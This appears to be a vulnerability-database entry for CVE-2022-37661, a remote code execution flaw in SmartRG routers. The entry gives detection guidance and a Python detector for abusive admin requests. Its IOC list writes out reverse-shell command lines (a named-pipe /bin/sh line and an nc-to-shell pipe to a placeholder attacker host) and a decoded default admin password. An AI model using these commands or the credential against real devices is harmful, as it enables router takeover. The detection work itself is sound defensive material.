CVE-2022-37661
published 2022-09-14

CVE-2022-37661: SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.

Priority P188, critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 36.19% (98.3th percentile)

Affected

2 ranges

Vendor | Product         | Version range | Fixed in
adtran | sr506n_firmware |               |
adtran | sr510n_firmware |               |

Detection & IOCs (extracted from sources)

url: /admin/ping.html
url: /admin/pingHost.cmd
other: YWRtaW46QWRtMW5ATDFtMyM=3D
command: rm /tmp/s & mknod /tmp/s p & /bin/sh 0 /tmp/s
command: |nc {lhost} {payload_port}|sh
  • Detect HTTP requests to /admin/ping.html and /admin/pingHost.cmd bearing a Basic Authorization header matching the hardcoded base64 credential 'YWRtaW46QWRtMW5ATDFtMyM=3D' (decodes to admin:Adm1n@L1m3#).
  • Alert on creation of a named pipe at /tmp/s (via mknod) on SmartRG router devices, which is a strong indicator of reverse-shell staging activity.
  • Look for outbound netcat (nc) connections from router processes, particularly piped to /bin/sh, as the exploit establishes a reverse shell using 'nc <lhost> <port> | sh'.
  • The exploit targets SmartRG SR506n firmware 2.5.15 and SR510n firmware 2.6.13; flag these specific version strings in asset inventory or banner-grabbing results for prioritized patching.
  • The exploit uses a hardcoded default/known credential for the router admin interface. The base64 value 'YWRtaW46QWRtMW5ATDFtMyM=3D' decodes to admin:Adm1n@L1m3#. Devices still using this default credential are immediately exploitable without any prior reconnaissance.
  • The exploit assumes the router is reachable at the default LAN gateway address 192.168.1.1, meaning exploitation is primarily an adjacent-network or LAN-side attack vector unless the admin interface is exposed to WAN.
  • The sessionKey required for the pingHost.cmd request is dynamically scraped from the /admin/ping.html page, meaning the exploit requires a valid authenticated session; exploitation depends on either default credentials or a previously compromised account.
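
The first detection bullet, worked through as an added example (not code from this page or its sources): it flags requests to the two admin paths and escalates when the Basic token is either the literal IOC string or decodes to the default credential. The trailing "3D" on the listed token is not valid base64, so the decoder stops at the padding. The function names and the request heads in `SAMPLES` are constructed for illustration.

```python
import base64
import re

# Values below are the ones listed on this page; everything else is constructed.
WATCH_PATHS = ("/admin/ping.html", "/admin/pingHost.cmd")
IOC_TOKEN = "YWRtaW46QWRtMW5ATDFtMyM=3D"  # literal header value, trailing "3D" included
DEFAULT_CRED = "admin:Adm1n@L1m3#"
_B64_PREFIX = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def decode_basic(token):
    """Decode a Basic token, ignoring anything after the padding (such as '3D')."""
    m = _B64_PREFIX.match(token)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
    except ValueError:  # bad length or padding
        return None

def classify(raw_request):
    """Return None, 'admin-ping-access' or 'default-credential-ping'."""
    head = raw_request.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = head[0].split(" ")
    if len(parts) < 2 or parts[1].split("?", 1)[0] not in WATCH_PATHS:
        return None
    for line in head[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        token = token.strip()
        if scheme.lower() == "basic" and (
            token == IOC_TOKEN or decode_basic(token) == DEFAULT_CRED
        ):
            return "default-credential-ping"
    return "admin-ping-access"

# Constructed request heads, as a proxy or sensor with header capture would see them.
SAMPLES = [
    "GET /admin/ping.html HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "Authorization: Basic " + IOC_TOKEN + "\r\n\r\n",
    "GET /admin/pingHost.cmd?a=1 HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "authorization: basic YWRtaW46QWRtMW5ATDFtMyM=\r\n\r\n",
    "GET /admin/ping.html HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "Authorization: Basic b3BlcmF0b3I6eA==\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLES:
        print(classify(req), "<-", req.split("\r\n", 1)[0])
```

Matching on the decoded credential as well as the literal string catches clients that send the correctly padded token without the "3D" suffix.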

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck | 9.8 | CRITICAL